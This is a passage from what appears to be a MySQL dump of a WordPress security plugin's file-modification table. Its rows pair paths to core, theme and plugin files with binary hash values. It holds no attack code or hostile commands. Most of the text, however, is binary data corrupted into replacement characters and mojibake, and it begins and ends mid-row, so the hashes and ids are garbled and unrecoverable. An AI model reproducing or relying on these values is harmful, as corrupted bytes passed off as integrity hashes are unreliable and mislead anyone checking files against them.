�%��5�j�*Y���3������m�J','',0,'?'),('�N)��_��g8Mv�','wp-content/themes/relia/sidebar-left.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�f��I�\\C�]Gj+j','\\�_�=�0�!�8�M�*���v/�D�h���dr','',0,'?'),('�͍�����ρb�B','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|DZ(���r��q֧#','�)0������+���^h��v.(��>����','',0,'?'),('�[��#�TR\Z=�B��','wp-content/themes/illdy/inc/components/related-posts/class.mt-related-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4B�h�A��i\nY',';�z��ȇ�����EMl��x����fe���','',0,'?'),('��QR��C-hbT�','wp-content/plugins/all-in-one-wp-migration/changelog.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z��Q��w)*�','�\\\0��h^5b+�8��&%L�rj��2�~V','',0,'?'),('����3Ypv��n�Y','wp-content/themes/travelify/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$s�/�w�x�*�U�8','̓jHY0�	�X����vuȫ�y��y:�.��','',0,'?'),('�,���i c9�H��','wp-content/themes/nirvana/languages/fr_FR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"�������K�','�\r�pMT6d��L��`.h0!�r�~�cw\\�','',0,'?'),('�$������X�P�','wp-content/themes/fabulous-fluid/js/customizer-custom-scripts.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�Җ#�6�ٮ��~��`','c�!��Y ��X�B:��ǵW�d^*(����D0','',0,'?'),('�3-�����f��\n','wp-includes/css/dist/list-reusable-blocks/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(�}�Z�a��/��L�','��k���;W�\Zq��54�BP���� n���$�','',0,'?'),('�;��!1�>�Y�xQ�','wp-includes/js/dist/block-editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')����ZW�i[T�','��U���n|h\'�x������^�d1\"kk','',0,'?'),('�JhJ�*���G�����','wp-content/themes/wen-business/assets/images/widget-shadow.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�5�6QZ�T��1W�{','&b�rD,�/DʱM�RJ�\n3�lA,r��#g@�','',0,'?'),('�a��nFh #ۈ���','wp-content/plugins/contact-form-7/modules/acceptance.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��)�F��9D����','J��(d\\��XV�U�U�Nk`���v�s����','',0,'?'),('�d4��{�rc�H�H','wp-content/themes/point/images/bigthumb.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%dXe�RM��]<8','��1��2}DM��Z�/�18�X��Av���BqÄ','',0,'?'),('�n�\"�#Y6�H㘊��','wp-content/themes/lightly/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��B8Y�&�%','tɏ���˥xV���F�I�O]|��UOΫ','',0,'?'),('��C\'���dw[���R��','wp-content/plugins/unyson/framework/includes/option-types/icon/static/css/backend.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"E��y3֐��458�','����b�&G�X����qʇ~���AB���','',0,'?'),('���{	w\"qW��J1�','wp-content/plugins/wp-date-remover/admin/partials/wp-date-remover-admin-display-notice.php',0,'k���׍|��ZV','k���׍|��ZV','%��<�L��yo�m��l�.r�*������s��','',0,'?'),('��ah�#��8�c���','wp-includes/js/tinymce/themes/inlite/theme.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4O��DIc`��EJ','p�v�T5Z>j��j�\0\0��f��xa/g=�&�','',0,'?'),('��}��D|����	=','wp-content/themes/twentytwentyone/assets/sass/05-blocks/image/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�(�]�E�����','\Z���KI-A�\ZC~#u@�����j������','',0,'?'),('���r=����c���Mz','wp-includes/js/dist/is-shallow-equal.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K�?l�/=�~}�','\'7}�)�AL��fs҇��������U�?x$!�','',0,'?'),('�о���\Z�?m;x���','wp-content/themes/hueman/assets/front/fonts/titillium-semibold-webfont.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4D�9�߄>�dX�S','��2]i�.�a�*�3!3L�W�b�������','',0,'?'),('��ں�u���M���[\r','wp-admin/images/wpspin_light-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mS������y\"C���','��66S�X������6O}�4>�p�\"���\'1','',0,'?'),('��Nx��ډ\Z�8yH\\�','wp-admin/js/theme-plugin-editor.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,�Q����8G6%�Z','^����ܱ�-��V�06��$?�ͪ�4`AZ','',0,'?'),('��sSk�i�<4\'c�-6','wp-includes/js/wp-embed.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�N�O8L^�sWkJ�<','�� �E��>�@_�0���!�B����5','',0,'?'),('�ٷ�9#�i���\"�T�','wp-content/plugins/unyson/framework/includes/container-types/box/class-fw-container-type-box.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�=5��4�.z��','݅��}C��RTB\r�B�H9�)�t�9�j-u�','',0,'?'),('��\"ǹnF�s:�u�','wp-content/themes/clean-magazine/js/source/clean-magazine-customizer-custom-scripts.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c;�ݟ\\ә�I���=a�','��9ܨ�A� B�B�R�o��$5ak�N��<�E','',0,'?'),('��ie��BK�Q*W','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.uk.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����:��>,)�6','����C#��3q�{�iu��<t�� �TwW�','',0,'?'),('���e��97�aJS','wp-includes/images/smilies/icon_smile.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3�.)�2���p���','ˠ�\",�Rʨ�Tr=�o��r�З:����','',0,'?'),('���7=;�u\"	��<>A~','wp-content/themes/lightly/js/scripts.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4b3��yn#P\"���~3Q','�..����Q}��hŧ�\"��n�~:�6��','',0,'?'),('��m9^/�;i[�ه��','wp-content/themes/sg-window/publication/header.php',0,'���B��!���~\r�M^','���B��!���~\r�M^','x�N�	gE�)�5��x����������dU','',0,'?'),('��XQ���d9r�ڼ��','wp-includes/customize/class-wp-customize-themes-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��T��vl��3��','�,V���3R�w���.���\r׭+4ݦ`=�`R','',0,'?'),('�el�5�s��E�úQ�','wp-admin/js/media-upload.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p�X��ϟ)�>��\n','~��\Z���u]��1�����A�#�V�2U��','',0,'?'),('��,CUU����9i-','wp-includes/css/wp-auth-check.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�igtߝ�>!�If�L','��Ȉ9he��(�_��#„R����ˈI�ه�j�','',0,'?'),('��l�/ع��=�3','wp-content/themes/hueman/assets/front/js/jquery-plugins/jqueryimgSmartLoad.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x��Z�B��RM�M','�\Z�(��ߍ��?)��F2<)��Aֲ���l�','',0,'?'),('���=�a�_� ��\n{�','wp-content/themes/sg-window/content-archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�D�=UE\"V�uVcP��','B��P�W�N0��?<��C�[ZՅ�o���?�','',0,'?'),('��i�\Z!�[�8$\"�','wp-content/plugins/wordfence/vendor/maxmind-db/reader/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��8e_�T��ƽW','ݬ�IS�P\"�a�� 7J�6�QSv���_��y�','',0,'?'),('��o>�V��_�r��','wp-content/themes/twentytwentyone/assets/sass/05-blocks/list/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ŃϽ�}O)�E��','�6�������-U��U(U�yYc�\"	m��i','',0,'?'),('��#�g�T�oqy��','wp-content/themes/nirvana/fonts/elusive.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���	�󉎪]C��9�','����4Jb�N��Fs�i�m���O��O���A�','',0,'?'),('��j��=��)m�{�*:','wp-content/themes/accelerate/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I�_�]t5G�,nxa�','n#q{;����Q�l����\"�W��K�8','',0,'?'),('��~���ڄx��\\J�@','wp-content/themes/fabulous-fluid/inc/customizer-includes/customizer-header-options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L�,΀�Ym�b7��','v&|�ޑ��o�Nྺ�3�k���ja�ŋ1�','',0,'?'),('�ȉV?	��]�)A','wp-includes/js/media-views.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4�9�ˡ���z�,7��','�NK���v��e5\"&���DG*H�	','',0,'?'),('��C��U�)�-(�><','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/divider/config.php',0,'F!�;H���R�#ʗ_','F!�;H���R�#ʗ_','\'�A5�3��d$%��i~�X���ؾڲ-','',0,'?'),('��P��?��Cmۄ��','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/nl.js',0,'�J��LX�@q�Yf�9','�J��LX�@q�Yf�9','+B����Y �2��ո+����0��|�1��','',0,'?'),('��`h�NkO�N8��','wp-includes/blocks/file/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��k��8��܎X1','�w�0�{��\n}\'�ٶ����XL�-Z#��_�','',0,'?'),('���W���=�ԘHd�z','wp-includes/class-wp-site-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K��h�$PZ�ck�\nd','?D�f�����y���#w\"/�*��yr� ��aF','',0,'?'),('��X����-�4�J�_�3','wp-content/plugins/wordfence/lib/wordfenceHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!~��-i���1','P�\0�\r/��;I�\n2\'��\'�v8����%q�Dl','',0,'?'),('����\'>�[��·�','wp-admin/js/user-profile.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a�3J����d�SWC','�M+���L%P8X6��bzy\'��8	�[�','',0,'?'),('��݈�H���.��','wp-content/plugins/all-in-one-wp-migration/lib/model/import/class-ai1wm-import-validate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�GTӮ�5\"�5�>c�',',�\ZA\\?��U��J6��\ZO�����Z8ת���B','',0,'?'),('��Ц��p`Z���jZ','wp-content/themes/verbosa/content/content-audio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6�l@U>\'\"N3�	;�\r','����k�M�<�>�O�LxSR=Jl��s\\���J','',0,'?'),('���-C��$W��F�5','wp-content/themes/nirvana/includes/tgm.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�jQS���EU�V�ܸ','�\'ԍ0���i4CP7�����9F�3�','',0,'?'),('��_�Ϊ�%���ݗ�&�','wp-content/themes/verbosa/includes/admin-functions.php',0,'b�=��`~�#��d6j4','b�=��`~�#��d6j4','����(L�s9<���M�vQut�Zۘ\n�S2�x','',0,'?'),('���Pd������c�3','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/http.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r����s�?�K��1\"','�Ĩ:E��kE��N�k\rFO>\"gvP��\"@��','',0,'?'),('�O�X�g]<f@�','wp-admin/css/farbtastic-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S@��[�\\,�3|��!','�Sm�\'�;d`��e�M�0i=�?>����?{','',0,'?'),('�3��Ƈe�(ú9�','wp-includes/js/jquery/suggest.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s\\+A)���n.;��','I<�{\04�`��<!j��Z8돲��D�HW��','',0,'?'),('��b����N�8�hk�','wp-includes/rest-api/search/class-wp-rest-term-search-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��G!D�tC>�!‘','`��B	C�Y�\\�؟�NfJ)O�W�U��q?2~y\r','',0,'?'),('�zo=y\'��cS7F0�','wp-content/themes/nirvana/images/back.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_��i�R��ŲL��','�+T�MJ�c��7���;���(o50;M��6�IO','',0,'?'),('��\\�(��wB��I�','wp-admin/network/update.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l��	ΒRU;�pp�b�','��,�!��m4f������NR�\n���B��^','',0,'?'),('�$�+K71�y(�F���','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-backup.php',0,'<Qm�tS2W��9�qpt�','<Qm�tS2W��9�qpt�','�A��s��E�%ᡚuҫ��-t f#̳�n�W','',0,'?'),('�%�t��l5<\n\n�h�','wp-content/plugins/wordpress-seo/vendor/yoast/api-libs/google/auth/Google_OAuth2.php',0,'	n��;�<b�]�V�','	n��;�<b�]�V�','�f,�vFԷ�)����[���V��6m��','',0,'?'),('�(tTlDά7&��MP.�','wp-includes/js/tinymce/tiny_mce_popup.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B7�I1�0�����d�','���\'З��/!\Z�a!�~�)��1D��','',0,'?'),('�*I��;�R&2�u��','wp-content/plugins/spam-captcha/core/lang/SL_framework-vi_VN.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+n�b0x���B�','�Xn���)�5��Ӄ��%�?C�zjY�%','',0,'?'),('�+��F�a\"�K��!��$','wp-content/themes/wen-business/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����������\nP�','��G���i��fӶ	�T��BB��ihq��','',0,'?'),('�,.��uo�<����Q','wp-content/themes/square/inc/css/admin-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c�.�\n6���:���','N����2•Ԃ<!3ա	$�<�8Ӹ7Jkk�','',0,'?'),('�/	�E:K�R寥�v�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V��[�SPk�C�','��ںم�Ŵ��}C:�ø=�~��Q�(8��$Q','',0,'?'),('�<�Ȟ�II8�5�','wp-content/themes/fabulous-fluid/js/customizer-custom-scripts.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\�3\\��4y�Za<��','�T:O�H��h���P��Kw47m���_��h��','',0,'?'),('�?ɢ����4Rݽ�px','wp-content/plugins/unyson/framework/helpers/database.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+%&�Us��!�P|b','�L�8_k�A5o�EC(�4��M�rH�S','',0,'?'),('�@�F �Ӡ(���e*[','wp-admin/js/theme-plugin-editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ec[Pq,���d�','A��\0�vr���$E3�6ey�t.�f]�� XC\\c','',0,'?'),('�B��ه�v<Sv稳','wp-includes/SimplePie/Parse/Date.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N\\�O2�����C[\nջ','�=��<��ei|�M�qZ]V[]&I-q9)g�0','',0,'?'),('�C��	Ip�/l���','wp-content/themes/relia/inc/images/relia-logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p���fMt�k��','���#�|rbxN�y5�4�.ػ23�*��','',0,'?'),('�C�G�T�ҶWR� o�x','wp-content/plugins/spam-captcha/font-10.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=X��V�d�_F�/�]','Z�X��S�������Y�~�~`1f�;\'','',0,'?'),('�F� �GJ��B��s7�','wp-includes/js/media-models.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^����3��v�A*1','g���\"d3�\r?`�;�M�mU/X���}�r�b	','',0,'?'),('�J\'ƹ��K �W1ɲ�','wp-content/plugins/unyson/framework/core/components/extensions/manager/static/img/thumbnails/styling.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ɕ�x2�B*��K%8','��/�i�T^��]������NAD98\\���O','',0,'?'),('�W= \\\'x\"�W��}��d','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���թ�K���^㥾�','�M�8:�naƋGZ�qQdý!����\'��&g1','',0,'?'),('�_&�����H���g�','wp-content/themes/twentytwentyone/assets/js/responsive-embeds.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uׂ-%�?�\'���tJ��','���B��]��>LZo�#Q�^V�x���#�','',0,'?'),('�o��\rU�Z7)���','wp-content/plugins/unyson/framework/includes/option-types/icon-v2/class-fw-option-type-icon-v2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��(#8J�^}��W���','0�w?��]k��*�rz��gO!\'�n��P�\"','',0,'?'),('�p�x��\\?;�hE/��','wp-content/themes/twentytwentyone/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W�&<(���Ċ��Ba','l3 �aA]\Z��\\E���B�\\��Ƕ4����','',0,'?'),('�w��5���)���','wp-includes/css/wp-embed-template-ie.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)6��	؞мq ���','�o��+8]�Su�H.�C�g��R9�&�+���\\W�','',0,'?'),('��I�.�U�`����\"V','wp-content/plugins/unyson/framework/includes/option-types/map/class-fw-option-type-map.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ms(/�0��!�r','�T�`��Z	Qly������ǘ�;iPE.l�','',0,'?'),('���z�߈�ؠ�m3`��','wp-content/themes/hueman/assets/front/img/demo/3-160x160.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i��g ��]�԰�','D��z Ġ�с}�\Z1v��9���:�y�C��','',0,'?'),('��\0���+OW+�','index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m�]�#��N�X�,�','�Dz�\n�}_��7x,�9�t:��\'�\r����','',0,'?'),('��е��\"k�����j�G','wp-content/plugins/all-in-one-wp-migration/lib/view/assets/javascript/util.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ބL���\\ԡ��N�','�����/�)�_� ��t-t#�F��W|��}M<�i','',0,'?'),('����.M2���\\�','wp-content/plugins/wordpress-seo/admin/class-plugin-conflict.php',0,'	!��\nC��LԺ��<x�','	!��\nC��LԺ��<x�','��gOb���f$�M����7���2Pii�\n-','',0,'?'),('�����A���1\Z�;�','wp-includes/rss.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��L���<ڧ��m6a','� G�!ʪ�Q\nv��igS��j1T��vh-�_i�>','',0,'?'),('����	o�Ra��g���x','wp-content/themes/morfeu/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Nʇ�~�q�f�|�e�T','U�D$k��O�U�~B��:�v�a �f+�~\\','',0,'?'),('��F/�@3/��_d؂','wp-content/themes/fluida/content/content-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7<��ϦN��Jb�i','�A���eggU?��<����ŐWr���1�ֿ�`','',0,'?'),('�� C�����R��3O','wp-content/themes/square/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K����ᡴJ�','��S���|�g�����#a�+ߌש��J\n','',0,'?'),('��i%�pu��,�f�H','wp-content/themes/morfeu/assets/js/bootstrap/dropdown.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?�r儰�jU��5Vo-','\"n�pt�f8��c�W�۰�8�3�1(?�1���7k','',0,'?'),('���nM\02]\r^�r','wp-content/themes/twentytwentyone/assets/sass/05-blocks/table/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���/\n�Bt�;','VYj8�b��5�f�c]�7W�iƘ2H�N}�2�^','',0,'?'),('��Ua��0L}2��$}','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.et.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Wq`i�����^c�1','O{�JM5+�[�P-�kW�e{	gŏ�!\\f�','',0,'?'),('�ܥƙV��!׈���1�','wp-content/plugins/all-in-one-wp-migration/lib/view/export/help-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	W<�^?]n���.�','Y���K˖�&��U�AЋ1�-���	��Vv��','',0,'?'),('��O��(Hj����)','wp-content/themes/accelerate/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}p�Z�E�\0㢪?�l','�/?�u�6�Uf�D���5U�`�]D�pg�','',0,'?'),('��?sh�yA�b�Y^>S�','wp-content/themes/illdy/inc/customizer/assets/js/illdy-customizer-live-preview.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W��r��O�����$�','�x��E������dDp�\ZHKKyO�`�͒�]\r','',0,'?'),('���v�A\nGr�3C9`','wp-admin/includes/class-wp-internal-pointers.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^I[8T䍍�\\��=','Y^9�A\r+^-��iL�W��j��O���F��','',0,'?'),('��7x5��\0},�xp��','wp-content/plugins/all-in-one-wp-migration/lib/view/import/button-file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����ݐ\r�1���.��','�JW��v\0k��T��������p�)n\r�?��','',0,'?'),('�������d!�w\'~9�','wp-content/plugins/all-in-one-wp-migration/lib/model/export/class-ai1wm-export-database.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yÿ��D7)a�[�/�','�ӧ�w�8[��\0���]�0	W�s�sY>U�','',0,'?'),('��(ER�B[�S�U��','wp-content/themes/the-minimal/languages/the-minimal.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y{�df~k=Oj6�׼','r2�\n�s\r�-�}`�#P�]�U�<*�[�Fp','',0,'?'),('��O���Ԙ���','wp-content/themes/nirvana/fonts/Oswald-Light-webfont.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}��<s�w�	�G\"��','7\\o\"}�k��� gT/��lR�6Ѝu��w','',0,'?'),('�\n7�P��]�j�F�','wp-content/themes/accelerate/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zIĒg�@:��F���','��ʏ ��e0HF��h�j�L�\rt��$����Y�-','',0,'?'),('��W&����4�\0�,','wp-content/themes/clean-magazine/css/genericons/Genericons.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�\' ��N깛���V','�?���ǵ�_-ϟ��b7b�\Z�	�\'�fp>UG\0','',0,'?'),('�3X�/�����\'��P','wp-content/themes/twentytwentyone/inc/starter-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yp���\0E��0f�\'mv','��R�Jʶ�W��/r� �	١$�����','',0,'?'),('�3�SΌ�m�A�','wp-content/plugins/spam-captcha/core/lang/SL_framework-nb_NO.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�CC�zοn*\'���8�2','�X��9돡�]�#1vOHρ\Z�5�8��}蔼','',0,'?'),('�;�/g�Zl3H��s�','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.cz.php',0,'vR&A���L�t�s','vR&A���L�t�s','��F��%\n�,-�~�!GҼ6v�\Z^$VH�\Z�\n-','',0,'?'),('�Ebl8�y���}����','wp-includes/js/tinymce/plugins/link/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*NȒmQ������','�`3�cYQ����9Wޭ#l���p�S+G��4','',0,'?'),('�GǮ��#U���&\\�','wp-content/plugins/wordpress-seo/admin/google_search_console/class-gsc-marker.php',0,'j3(�u\\F�I�%���','j3(�u\\F�I�%���','�F��6�\'7�Sy�S^��.��^(��̾\"���','',0,'?'),('�U\nZ�8_��%G���','wp-content/themes/point/images/logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G� ��i|����pWv','���^��	e���[�h[��|��[�>zؾ','',0,'?'),('�b�ALi�T�����E��','wp-content/themes/tortuga/template-magazine.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J�kiw���<�W�','��g�u�Y�?�N�b63t� <��z�k*�.�','',0,'?'),('�m>�\0��0X&�^�Q','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/CurlRequest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��pKz��`�)9_@�','��aғYe�q�7YTc�Ȋi$�W�ت�/�!�,','',0,'?'),('�qA��$A;���V�','wp-content/plugins/unyson/framework/extensions/backups/includes/module/tasks/class-fw-ext-backups-task-type.php',0,'���q�O��#[�Ry�\\�','���q�O��#[�Ry�\\�','\"텃�}1�q]�m���L���D%��g�u\n','',0,'?'),('����8��vUȱ;�H','wp-content/themes/nirvana/fonts/ubuntu-b-webfont.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z��&�t�&Y\rO��)/','�Qzl=��/�H9`�_�]����슶��HJkt�','',0,'?'),('��bN���-��|�','wp-content/plugins/unyson/framework/includes/option-types/multi-upload/static/css/modal.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����C�Yg����X','��_����\Zl�z�B��YzE����	E�a�}O','',0,'?'),('���qE�$�����','wp-content/themes/illdy/layout/js/scripts.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rg���㿰�����P;','��	S�sЍ�!T\'L�X\n��M���k*,�','',0,'?'),('��Ǔ��肴����l','wp-content/themes/twentytwenty/assets/js/editor-script-block.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���A�Q~�.Yf�1:D',':馈���x�t[cJ��=�\Z�\Z���h��0','',0,'?'),('���7�E�c�|�&�','wp-content/themes/verbosa/cryout/framework.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Uv�c��֑��','\0W��M*��i�0��G�;ߪFÐd����?%','',0,'?'),('��?���z6���aDz','wp-content/plugins/wordfence/images/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K:�����m𙗣P�','j*�e����doX�~�7��&���N�9�|L���','',0,'?'),('��R�h;�_�����\0','wp-content/plugins/wp-date-remover/includes/index.php',0,'��{J!u?}��s�','��{J!u?}��s�','Aũ���`�9�7}b�>MH���JHh��|Fj','',0,'?'),('�и+:3�XnN�tex�X','wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmSU5fChc-AMP6lbBP.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����{W�7h>���','�	2m��w��3�)zWg��v{Af��Hu`Co','',0,'?'),('��)ß�O3���','wp-content/plugins/unyson/framework/includes/option-types/upload/views/images-only.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3�0~5ԑ���1<~�','�A��B�)�S!Ce�4ŸE*[������6�ߙ�','',0,'?'),('��;�D�\n_�qn�S0','wp-content/plugins/unyson/framework/core/components/extensions/manager/static/img/thumbnails/mailer.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','XKTJ��qd�pW3|7��','&<��^)�F�`�WU,�ޠ��N�!a��͵�C','',0,'?'),('���ʆ��n�D㮖�(','wp-admin/css/install.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��+g,L��i�^�','bye�쿟�\"�Sv�OhA�ߍ�?�`���a�','',0,'?'),('��j����5��f�j�','wp-content/plugins/wordfence/views/tools/options-group-live-traffic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!��L|�y+5*�M\0Qk','�����O�q��Fri���e�+�K�	�/;C','',0,'?'),('��@+�z4?��=��','wp-content/plugins/spam-captcha/img/icon-128x128.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�b������y���8�','�X�[��L�g�*c|h$�~�g\\������i=z�','',0,'?'),('�����=>zo��C�k','wp-content/plugins/spam-captcha/core/templates/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���m��J��|좍\rM','m�/`�����M��u�.X^^Ϫ(�.	�㿿','',0,'?'),('�F2(ѝ,��֓a��','wp-content/themes/travelify/library/panel/images/logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����0��_x�Iן','��*\0�A�j�+�/��\\Y�VD$o�S�x]#Q','',0,'?'),('�)ũ��2[�	